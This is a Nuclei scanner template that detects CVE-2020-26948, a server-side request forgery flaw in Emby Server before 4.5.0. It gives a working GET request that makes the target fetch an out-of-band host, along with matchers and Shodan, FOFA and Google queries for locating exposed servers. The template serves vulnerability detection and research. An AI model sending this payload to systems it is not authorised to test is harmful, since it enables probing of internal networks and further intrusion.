id: CVE-2020-26948

info:
  name: Emby < 4.5.0 - Server Server-Side Request Forgery
  author: dwisiswant0
  severity: critical
  description: |
    Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
  impact: |
    An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of Emby Server.
  reference:
    - https://github.com/btnz-k/emby_ssrf
    - https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Live-Hack-CVE/CVE-2020-26948
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26948
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26948
    cwe-id: CWE-918
    epss-score: 0.1449
    epss-percentile: 0.95606
    cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: emby
    product: emby
    shodan-query: http.title:"emby"
    fofa-query: title="emby"
    google-query: intitle:"emby"
  tags: cve2020,cve,emby,jellyfin,ssrf

http:
  - method: GET
    path:
      - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://oast.fun"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Interactsh Server"

      - type: word
        part: content_type
        words:
          - "text/html"
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 490a00463044022065f7dcf25588ec4a57619cd2d8afa5e7db0823bd5d138c8901c2128385b4f52f02201063d584f173e4b54d04b805289a4d9ca19e7f811955958c2ec3e02252348771:922c64590222798bb761d5b6d8e72950